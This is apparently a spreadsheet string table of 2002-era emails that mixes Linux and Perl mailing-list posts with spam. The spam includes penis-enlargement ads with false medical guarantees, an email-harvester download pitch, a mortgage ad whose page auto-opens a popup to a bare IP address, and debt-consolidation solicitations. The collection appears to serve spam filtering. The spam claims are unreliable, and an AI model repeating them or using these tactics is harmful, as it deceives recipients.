 http://www.laxpress.com/cgi-bin/emailoptin/mail.pl?jm@netnoteinc.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :
 &gt;     I was thinkinf about an addition of another file: apt-repositories.
 &gt;     Stick it on apt.freshmeat.net (the center of the apt universe, IMHO)
 &gt;     and every time a new repository is added, the RPM can be rebuilt. 
 &gt;     Heck, if I could get out of my depression, I could make the whole
 &gt;     submission process automated....even making the RPM...
 Well, I already keep a list of known apt repositories on
 http://freshrpms.net/apt/ although I haven't added the ones that were
 talked about lately (actually I've been very busy over the week-end and I'm
 sick right now...).
 You could make the whole submission automated, even making the rpm?
 &lt;subliminal message&gt;
 http://rpmforge.net/ needs *you*!
 &lt;/subliminal message&gt;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</si>
  <si>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Re: [ILUG-Social] Online Bookstores
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 06, 2002 at 04:21:22 +0100, David O'Callaghan wrote:
 &gt; 
 &gt; Hello,
 &gt; 
 &gt; What are your recommendations for buying books (technical and
 &gt; otherwise) online, from Irish or European sellers. Is there 
 &gt; anywhere that has as good a selection as, say, Amazon but
 &gt; deals in Euro?
 amazon.de and amazon.fr ? :-)
 C.
 -- 
 Caolan McNamara               |  caolan@skynet.ie  
 http://www.skynet.ie/~caolan  |  +353 86 8161184
 The way some people find fault, you'd think there was a reward
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: apt-get...universe (was: Sylpheed with GNOME 2
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002 11:07:00 +0200, Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; Once upon a time, Lance wrote :
 &gt; 
 &gt; &gt; Well, from the looks of things, I can import all my mail settings from
 &gt; &gt; Evolution to Sylpheed.  Has anyone successfully run Sylpheed in Gnome
 &gt; &gt; 2.0?  I noticed with 'apt-get install gnome-session' from the 'rpm
 &gt; &gt; http://apt.sunnmore.net gnome2 73' repository, Sylpheed isn't one of the
 &gt; &gt; packages selected for deletion.
 &gt; 
 &gt; I think that's simply because Sylpheed isn't a GNOME application, but a
 &gt; "simple" gtk+ one. It needs no GNOME libs at all, so upgrading to GNOME 2
 &gt; but keeping gtk+ 1.2 will let you keep Sylpheed with no problem.
     Yeah, mine works here; I did about the same thing.
     Hey: "Universe"   I saw this keyword on the gstreamer website.  They said something like "If you're feeling froggy and want to jump into it, use apt-get gstreamer-universe" but I've not gotten the syntax of it right, to get "all" of a project yet.  Has anyone used this yet?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</si>
  <si>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So then, Neale Pickett &lt;neale@woozle.org&gt; is all like:
 &gt; Maybe there's some subtle interaction between generators and lists
 &gt; that I can't understand.  Or something.  Being as I'm baffled, I don't
 &gt; imagine any theory I come up with will be anywhere close to reality.
 And then, just as I was about to fall asleep, I figured it out.  The
 tokenizer now has an extra [:], and all is well.  I feel like a real
 chawbacon for not realizing this earlier.  :*)
 Blaming it on staying up past bedtime,
 Neale
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bright dust rings highlight Earth-like planets
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8171675,1440/
 Date: Not supplied
 Rings around distant stars betray small rocky planets, say astronomers, 
 suggesting a census will soon be possible
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: liberal defnitions
</t>
  </si>
  <si>
    <t xml:space="preserve">
 In a message dated 9/24/2002 11:24:58 AM, jamesr@best.com writes:
 &gt;This situation wouldn't have happened in the first place if California
 &gt;didn't have economically insane regulations.  They created a regulatory
 &gt;climate that facilitated this.  So yes, it is the product of
 &gt;over-regulation.
 &gt;
 Which is to say, if you reduce the argument to absurdity, that law causes 
 crime. 
 (Yes, I agree that badly written law can make life so frustrating that people 
 have little choice but to subvery it if they want to get anything done. This 
 is also true of corporate policies, and all other attempts to regulate 
 conduct by rules. Rules just don't work well when situations are fluid or 
 ambiguous. But I don't think that the misbehavior of energy companies in 
 California can properly be called well-intentioned lawbreaking by parties who 
 were trying to do the right thing but could do so only by falling afoul of 
 some technicality.)
 If you want to get to root causes, we should probably go to the slaying of 
 Abel by Cain. Perhaps we can figure out what went wrong then, and roll our 
 learning forward through history and create a FoRKtopia.
 Nonpartisanly, which is to say casting stones on all houses, whether 
 bicameral or unicameral, built on sand or on rock, to the left of them or to 
 the right of them, of glass or brick or twig or straw, 
 Tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Better Sex for $2.99 until 08/26/2002 !!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Note: 
 This is NOT SPAM!! This is NOT Unsolicited Email!! You are receiving this message because you OPTED-IN to receive certain special offers from one of our partnering sites.
 Have you changed your mind?
 Do you want to STOP receiving these special offers? If so, go down to the bottom and click on the "unsubscribe" link to be removed from this OPT-IN only list.
 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 Dear Subscriber, Please take a moment to remove yourself from this list if you feel you are receiving these messages in error, by going down to the bottom and clicking on the unsubscribe link below.
 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 Special Offer $2.99 until 08/26/2202 5:00 pm
 1. Sexual Fitness and Penis Enlargement System
 ............................................................
 Video of the week:(Choking a Chinese Chicken?)
 Caught on tape!
 Some Asian Guy in a Chinese Dressing Room. What the hell is this guy doing in there? Is he actually chocking his chicken on tape? You'll see about him and more when you check out this special offer!
 Offer #08-515352-2002(4)
 Page (1 of 1)
 Special Offer $2.99 until 08/26/2202 5:00 pm
 ............................................................
 Subject : Male Enlargement/Strengthening and Total Sexual Fitness!
 For only............($2.99)!
 Just wanted to remind you about the special we have this month. Our total program has the following information:
         How to Increase Permanent Length!  
         How to Increase Permanent Width!
         How to stop pre-mature ejaculation!  
         How to stop Erectile Dysfunction!
         How to Increase Penis Strength!  
         How to make your Penis Thick and Meaty!
         How to Enlarge the Penis head (glans)!  
         How to Increase Staying Power!
         How to Increase Ejaculation Distance and Volume!  
         Plus much more!!!! 
 Plus our new Quick Start Program:
 *Quick Start - Extreme Sexual Fitness Program!
 Now you can Jump Start your Penis Enlargement and Sexual Fitness by using our Quick Start Program! The Quick Start Program is a no frills bare-bones Sexual Fitness and Penis Enlargement Cram Course set up to have you Gaining size and Performing Better in a really short amount of time. Once you finish the Quick Start Program you can Explore the whole Penis Enlargement Course. Using the Quick Start Program is totally your option. 
 *Video Library - Search our video library of Instructional and Original Amateur Entertainment Videos inside!
 *The Most information about Penis Enlargement and Sexual Fitness!
 With over (40) Different Techniques each explained step-by-step, this system is the best value for your money pound for pound!
 *The Lowest price on the Net! .....($2.99) for everything!!
 This offer is for a limited time only! Order Today!
 Special Offer $2.99 until 08/26/2202 5:00 pm
 For other Info:
 FAQ's
 Testimonials
 Ordering Info
 Business Opps
 Video of the week info
 Advertising Info
 Plus all other!
 Go to: www.bigthangz.com
 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 2. Boost your Sales!
 ............................................................
 Your Ad Will be here if you want it seen by Millions every month! Plus be in Widely circulated Magazines and Newspapers Nationwide! Plus join our Permission based email Advertising ring! Blow your sales through the roof!
 Ask us how at: sales@bigthangz.com
 Numbers 3-10...............Coming Soon!
 Have you changed your mind?
 Do you want to STOP receiving these special offers? If so, go down to the bottom and click on the "unsubscribe" link to be removed from this OPT-IN only list.
 ---
 To remove yourself from further mailings, click the link below:
 http://GetResponse.com/r.cgi?a=specialweboffers&amp;e=zzzz_Xyexample.com&amp;i=
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
  (xcutieamandax@yahoo.com) on Tuesday, July 30, 2002 at 01:29:47
 ---------------------------------------------------------------------------
 : &lt;BODY BGCOLOR=#000000&gt;&lt;FONT COLOR=#ff8080&gt;"Want a &lt;FONT size=+1&gt;&lt;B&gt;BIG&lt;/FONT&gt;&lt;/B&gt; &lt;B&gt;Penis&lt;/B&gt;?" Experience the results you've always wanted &lt;BR&gt;with a massive scientific breakthrough:&lt;/p&gt;Our Doctor-Approved Pill Will Actually Expand, Lengthen And Enlarge &lt;BR&gt;Your Penis. 100% GUARANTEED! &lt;/p&gt;Best of all, There Are NO Agonizing Hanging Weights, NO Tough &lt;BR&gt;Exercises, NO Painful And Hard-To-Use Pumps, And There Is NO &lt;BR&gt;Dangerous Surgery Involved. &lt;/p&gt;We Guarantee genuine lasting results! Vig-Rx pills will work for &lt;BR&gt;you 100%, or you will get &lt;font size=+1&gt;&lt;B&gt;&lt;U&gt;100% of your money back!&lt;/B&gt;&lt;/U&gt;&lt;/p&gt;&lt;BR&gt;&lt;A HREF=www.adult-here.com/enlarge&gt;Click here to give it a try&lt;/A&gt;&lt;/FONT&gt;&lt;/p&gt;&lt;I&gt;"This is one of the best investments I have ever made. I can not &lt;BR&gt;even begin to express how much gratitude I have for this product. I &lt;BR&gt;am not even through with my first bottle and have already grown 1 &lt;BR&gt;in. in length and just over 1 in. in girth, and I still have another bottle to go! No!
  more am I the average 6 inch guy. THANK YOU SO MUCH " Ben, Idaho&lt;/p&gt;&lt;/I&gt;&lt;/p&gt;&lt;/p&gt;To be removed from the opt-in list &lt;A HREF="mailto:Kerskil15@email.com?subject=Remove Me"&gt;click here&lt;/a&gt;&lt;/font&gt;
 ---------------------------------------------------------------------------
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] socket latency query
</t>
  </si>
  <si>
    <t xml:space="preserve">Vincent Cunniffe wrote:
 &gt; Does anyone have any practical experience with high-performance socket 
 &gt; code in C++ under Linux, and is there any speed difference between unix 
 &gt; domain sockets, loopback sockets, and a real ethernet interface if all 
 &gt; of the packets are going from one process on the machine to another 
 &gt; process on the same machine?
 In short yes. The more logic involved the longer
 the CPU is executing it. I.E. there is more logic
 executed (including NIC logic) when going down
 to the metal than when using lo. So how much
 logic is involved for each type of IPC (why
 are you limiting yourself to sockets? there are
 mutexes, shared mem, files, messages...). Anyway the
 best IPC method to choose is dictated by the data
 you want to communicate between the processes,
 as the various IPC mechanisms are tuned for
 various data types.
 IBM are running a series comparing doze and Linux IPC mechanisms.
 The socket (which references the others at the bottom) is here:
 http://www-106.ibm.com/developerworks/linux/library/l-rt6/?t=gr,Redhat=Sockets
 The following in google gave useful info also:
 "linux IPC mechanisms compared"
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lose 28 Pounds In 10 Days                     30201
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-10-03
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Mailing List Judo movie available
     * Conference Presentation Judo movie available
 +--------------------------------------------------------------------+
 | Mailing List Judo movie available                                  |
 |   posted by gnat on Wednesday October 02, @12:47 (news)            |
 |   http://use.perl.org/article.pl?sid=02/10/02/1647249              |
 +--------------------------------------------------------------------+
 [0]gnat writes "Mark-Jason Dominus's [1]Mailing List Judo is now
 available from perl.org. Thanks to David Wheeler for recording Mark's
 sessions. Conference Presentation Judo will come later today ..."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/10/02/1647249
 Links:
     0. mailto:gnat@oreilly.com
     1. http://www.perl.org/tpc/2002/movies/
 +--------------------------------------------------------------------+
 | Conference Presentation Judo movie available                       |
 |   posted by gnat on Wednesday October 02, @18:56 (news)            |
 |   http://use.perl.org/article.pl?sid=02/10/02/2257211              |
 +--------------------------------------------------------------------+
 [0]gnat writes "Mark-Jason Dominus's [1]Conference Presentation Judo
 presentation is online at perl.org. Thanks again to David Wheeler for
 recording this at OSCON."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/10/02/2257211
 Links:
     0. mailto:gnat@oreilly.com
     1. http://www.perl.org/tpc/2002/movies/mjd-conf-judo/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</si>
  <si>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ADV:Harvest lots of Target Email address quickly
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;BODY bgColor=#ffccff&gt;
 &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width=475&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=middle vAlign=top&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;BR&gt;
 &lt;TABLE&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width="5%"&gt;&lt;/TD&gt;
     &lt;TD bgColor=#b8ecff borderColor=#0000ff width="90%"&gt;&lt;FONT color=#ff0000 
       face="Arial Black" 
       size=6&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Want 
       To Harvest A Lot Of &lt;FONT color=#0000ff&gt;Target &lt;/FONT&gt;Email&amp;nbsp;&amp;nbsp; 
       Addresses In A Very Short Time?&lt;/FONT&gt; 
       &lt;P&gt;&lt;B&gt;&lt;FONT face=Arial size=4&gt;&lt;/FONT&gt;&lt;FONT color=#ff00ff face=Arial 
       size=4&gt;&lt;FONT color=#0000ff&gt;Target Email Extractor &lt;/FONT&gt;is&amp;nbsp; a&amp;nbsp; 
       powerful&amp;nbsp; Email&amp;nbsp; Software that&amp;nbsp; harvests Target Email 
       Addresses from search engines, any specified starting URLs , including cgi 
       , asp pages etc.&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT color=#000000 face= size=2&gt;&amp;nbsp; It Quickly and automatically 
       search and spider from search engine, any specified starting URLs to find 
       and extract e-mail addresses&lt;BR&gt;&lt;/P&gt;
       &lt;LI&gt;Powerful targeting ability. Only extract the specific email addresses 
       that directly related to your business.&lt;BR&gt;
       &lt;LI&gt;Integrated with 18 top popular search engines: Yahoo, Google, MSN, 
       AOL&lt;BR&gt;
       &lt;LI&gt;Fast Search Ability. Nearly can find thousands of e-mail addresses in 
       an hour, allowing up to 500 simultaneous search threads!&lt;BR&gt;
       &lt;LI&gt;Helpful for anyone for internet Email marketing purposes.&lt;BR&gt;
       &lt;LI&gt;Free version updates.&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT color=#ff0000 face=Arial 
       size=4&gt;&lt;I&gt;&lt;STRONG&gt;Click The Following Link To Download This 
       Program:&lt;/STRONG&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;/LI&gt;
       &lt;P&gt;&lt;B&gt;&lt;FONT color=#ff0000 face=Arial size=4&gt;&lt;A 
       href="http://www.wldinfo.com/download/email/ESE.zip"&gt;Download Site 
       1&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
       &lt;P&gt;&lt;B&gt;&lt;FONT color=#ff0000 face=Arial size=4&gt;&lt;A 
       href="http://bestsoft.3322.org/onlinedown/ESE.zip"&gt;Download Site 
       2&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
       &lt;/FONT&gt;&lt;/B&gt;&lt;FONT size=2&gt;&lt;FONT color=#0000a0 face=Arial 
       size=3&gt;&lt;STRONG&gt;If&amp;nbsp; you can not download this program ,&amp;nbsp; please 
       copy the following link into your URL , and then click " Enter" on your 
       Computer Keyboard.&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT size=2&gt;&lt;FONT color=#0000a0 face=Arial size=3&gt;&lt;STRONG&gt;Here is the 
       download links:&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;DIV&gt;
       &lt;P&gt;http://www.wldinfo.com/download/email/ESE.zip&lt;/P&gt;
       &lt;P&gt;http://bestsoft.3322.org/onlinedown/ESE.zip&lt;/P&gt;&lt;/FONT&gt;&lt;/DIV&gt;
       &lt;P&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width="5%"&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width="5%"&gt;&lt;/TD&gt;
     &lt;TD bgColor=#0f95de width="90%"&gt;&lt;FONT color=#ffffff 
       face="Verdana, Tahoma, Helvetica, SansSerif" 
       size=1&gt;&lt;B&gt;Disclaimer:&lt;/B&gt;&lt;BR&gt;We are strongly against continuously sending 
       unsolicited emails to those who do not wish to receive our special 
       mailings. We have attained the services of an independent 3rd party to 
       overlook list management and removal services. This is not unsolicited 
       email. If you do not wish to receive further mailings, please click this 
       link &lt;A href=" http://www.autoemailremoval.com/cgi-bin/remove.pl " 
       target=_blank&gt;&lt;FONT 
       color=#fdd32a&gt;&lt;B&gt;http://www.autoemailremoval.com/cgi-bin/remove.pl 
       &lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;. Auto Email Removal Company. Ref# 
       01222263545&lt;/FONT&gt;&lt;B&gt;&lt;FONT class=disclaimer color=#000080 
       face=Arial&gt;&lt;BR&gt;This message is a commercial advertisement. It is compliant 
       with all federal and state laws regarding email messages including the 
       California Business and Professions Code. We have provided the subject 
       line "ADV" to provide you notification that this is a commercial 
       advertisement for persons over 18yrs old.&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;
     &lt;TD width="5%"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;A href=""&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;A 
 href=""&gt;&lt;/A&gt;&lt;BR&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;html&gt;&lt;body&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;                                          &lt;br&gt;&lt;a href=                            &gt;                                                                    &lt;/a&gt;&lt;br&gt;                                         &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-10-08 at 10:36, Matthias Saou wrote:
 &gt; Hi there,
 &gt; 
 &gt; Two new things today :
 &gt; 
 &gt; 1) I've had to install a Red Hat Linux 6.2 server because of an old
 &gt; proprietary IVR software that doesn't work on newer releases :-( So I've
 &gt; recompiled both the latest apt and openssh packages for it, and they are
 &gt; now available with a complete "os, updates &amp; freshrpms" apt repository at
 &gt; apt.freshrpms.net, for those who might be interested.
 Gack. Did you try 7.3 with the compat-glibc first? Or does it require an
 antique kernel?
 -- 
 Chris Kloiber
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You Are Approved For Your Loan!!!   Approval No. (1848025)
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body onLoad="(window.open('http://66.231.133.201/nationwide/'))" link="#0000FF" vlink="#0000FF" alink="#0000FF"&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="1" width="600" bordercolordark="#000080" cellspacing="0"
   bordercolor="#000080" bgcolor="#FFFFCC"&gt;
     &lt;tr&gt;
       &lt;td width="100%"&gt;
         &lt;table border="0" width="100%" cellspacing="0" cellpadding="0"&gt;
           &lt;tr&gt;
             &lt;td width="100%" bgcolor="#FFFFCC" valign="middle" align="center"&gt;
               &lt;p align="center"&gt;&lt;font face="Arial Black" size="4"
               color="#0000FF"&gt;&lt;br&gt;
               &lt;/font&gt;&lt;font face="Arial Narrow" color="#0000FF" size="5"&gt;&lt;b&gt;Refinancing
               Your Mortgage May Be Easier Then You Think!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial Narrow" color="#D6321B"
               size="5"&gt;Now that rates are down,&amp;nbsp;&lt;br&gt;
               this may be a good time to start saving money!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;p align="center"&gt;&lt;font color="#0000FF" size="2"
               face="Microsoft Sans Serif"&gt;&lt;a href="http://66.231.133.201/nationwide/"&gt;Click here for all details&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;div align="center"&gt;
           &lt;center&gt;
           &lt;table border="0" width="100%" cellspacing="0" cellpadding="0"&gt;
             &lt;tr&gt;
               &lt;td width="100%" valign="middle" align="center"
               bordercolor="#000000" bgcolor="#FFFFCC"&gt;&lt;b&gt;&lt;font
                 face="Arial Narrow" size="5" color="#0000FF"&gt;Free Service for USA Homeowners!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;div align="center"&gt;
           &lt;center&gt;
           &lt;table border="0" width="100%" cellspacing="0" cellpadding="0"&gt;
             &lt;tr&gt;
               &lt;td width="100%" bgcolor="#000000"&gt;
 &lt;P align=center&gt;&lt;b&gt;&lt;font size="3" face="Arial" color="#00FF00"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font color="#FFFFCC" face="Arial Narrow" size="4"&gt;Whether
 your credit rating is A++ or you are &amp;quot;credit challenged&amp;quot;,
 we have many loan&amp;nbsp;&lt;br&gt;
  programs through hundreds of aggressive lenders wanting to help you.&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/P&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="0" width="96%" bgcolor="#000000" cellspacing="0"
   cellpadding="0"&gt;
     &lt;tr&gt;
       &lt;td width="100%"&gt;
                 &lt;P align=left&gt;&lt;b&gt;&lt;font face="Arial Narrow" color="#FFFF00"
                 size="4"&gt;Second Mortgages&lt;/font&gt;&lt;font face="Arial"
                 size="3" color="#FFFFFF"&gt;&lt;br&gt;
                 &lt;/font&gt;&lt;font face="Arial"
                 size="3" color="#FFFFCC"&gt;
                 We can help you get up to 125% of your
 homes value (ratios vary by state).&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/P&gt;
 &lt;P align=left&gt;&lt;b&gt;&lt;font face="Arial Narrow" color="#FFFF00" size="4"&gt;Refinancing&lt;/font&gt;&lt;font
 face="Arial" color="#00FF00" size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font
 size="3" face="Arial" color="#FFFFCC"&gt;Reduce your monthly payments and get
 some cash back.&lt;/font&gt;&lt;/b&gt;&lt;/P&gt;
 &lt;P align=left&gt;&lt;b&gt;&lt;font face="Arial Narrow" color="#FFFF00" size="4"&gt;Debt
 Consolidation&lt;/font&gt;&lt;font size="3" face="Arial" color="#00FF00"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font size="3" face="Arial" color="#FFFFCC"&gt;Combine all your bills into one low
 payment,
 and save money every month.&amp;nbsp;
 &lt;/font&gt;&lt;/b&gt;&lt;/P&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;P align=center&gt;&lt;font color="#FFFF00" face="Arial Narrow" size="5"&gt;&lt;b&gt;We will get you the
 best deal possible!&amp;nbsp;&lt;br&gt;
  Lower rates and easier terms!&lt;/b&gt;&lt;/font&gt;&lt;/P&gt;
 &lt;P align=center&gt;&lt;b&gt;&lt;a href="http://66.231.133.201/nationwide/"&gt;&lt;FONT 
 color=#FFFFCC size=4 face="Arial Narrow"&gt;CLICK 
 HERE For All Details And A Free Loan Quotation 
 Today!&lt;/FONT&gt;&lt;/a&gt;&lt;/b&gt;&lt;/P&gt;
 &lt;P align=center&gt;&lt;/P&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
       &lt;/center&gt;
       &lt;p align="center"&gt;&lt;font face="Arial" color="#D6321B" size="2"&gt;We strongly
 oppose the use of SPAM email and do not want anyone who does not wish to receive
 our&amp;nbsp;mailings to receive them. We strongly oppose the use of SPAM email and do not want anyone who does not wish to receive our mailings to receive
       them. &lt;a href="mailto:mortgagemarkets@excite.com?subject=remove"&gt;Click
       Here to&lt;/a&gt; me taken off of our list.&lt;BR&gt;    &lt;/font&gt;&lt;font face="Elephant" size="3"&gt;&lt;b&gt;&lt;br&gt;
       &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;/html&gt;
 ******************************************************************
 80686
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Need Help with your bills... [t4are]
</t>
  </si>
  <si>
    <t xml:space="preserve">*This message was transferred with a trial version of CommuniGate(tm) Pro*
 &lt;HTML&gt;&lt;CENTER&gt;&lt;table&gt;&lt;tr&gt;&lt;td bgcolor=99cc99&gt;&lt;table width=490 cellpadding=3 cellspacing=3 border=0&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;font face=arial color=000000 size=5&gt;&lt;i&gt;
 &lt;table BORDER cellpadding =3 width =595 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" BGCOLOR=#99cc99&gt;
 &lt;td align=center WIDTH="100%" BGCOLOR="#99cc99" bordercolor="#99cc99"&gt;&lt;font face=Verdana COLOR=blue size=-1&gt;&lt;B&gt;Free Debt Consolidation Information
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;BR&gt;
 Free 1 Minute Debt Consolidation Quote&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;font face=arial color=0000AA size=-2&gt;* Quickly and easily reduce Your Monthly Debt Payments Up To 60% &lt;BR&gt;&lt;BR&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align=center&gt;&lt;font face =arial size=2 color=000033&gt;We are a 501c Non-Profit Organization&lt;/b&gt; that has helped 1000's consolidate their&lt;br&gt; debts into one easy affordable monthly payment. For a Free - No Obligation&lt;/b&gt;&lt;br&gt; quote to see how much money we can save you, please read on.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;center&gt;&lt;table cellpadding=4 cellspacing=4&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;FONT size=2 COLOR=blue FACE=ARIAL,HELVETICA&gt;&lt;i&gt;Become Debt Free...Get Your Life Back On Track!&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table cellpadding=2 cellspacing=2&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;FONT size=2 COLOR=003333 FACE=ARIAL,HELVETICA&gt;All credit accepted and home 
 ownership is NOT required.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;FONT size=2 COLOR=003333 FACE=ARIAL,HELVETICA&gt;
 &lt;tr&gt;&lt;td align=center&gt;&lt;FONT size=2 COLOR=003333 FACE=ARIAL,HELVETICA&gt; Not Another Loan To Dig You Deeper In To Debt!&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table cellpadding=4 cellspacing=4&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;font face=arial size=2 color=blue&gt;&lt;font color=#000000 size=3&gt; &lt;/font&gt;100% Confidential - No Obligation - Free Quote &lt;font color=33000 size=3&gt; &lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;font face=arial size=4&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/HTML&gt;
 &lt;title&gt;Free Debt Consolidation Quote&lt;/title&gt;
 &lt;BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" ALINK="#0000FF" VLINK="#99cc99"&gt;
 &lt;table cellpadding=3 cellspacing=3 BORDER=0 WIDTH="495"&gt;
 &lt;tr&gt;&lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;&lt;font face=Verdana color=#000000 size=+0&gt;If you have $4000 or more in debt, a trained professional&lt;br&gt; will negotiate with your creditors to:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;CENTER&gt;
 &lt;table cellpadding=3 cellspacing=3 BORDER=0 WIDTH="450"&gt;
 &lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;&lt;font face=Verdana color=#000000 size=-1&gt;
 Lower your monthly debt payments up to 60%&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;&lt;font face=Verdana color=#000000 size=-1&gt;
 End creditor harassment&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;&lt;font face=Verdana color=#000000 size=-1&gt;
 Save thousands of dollars in interest and late charges&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;&lt;font face=Verdana color=#000000 size=-1&gt;
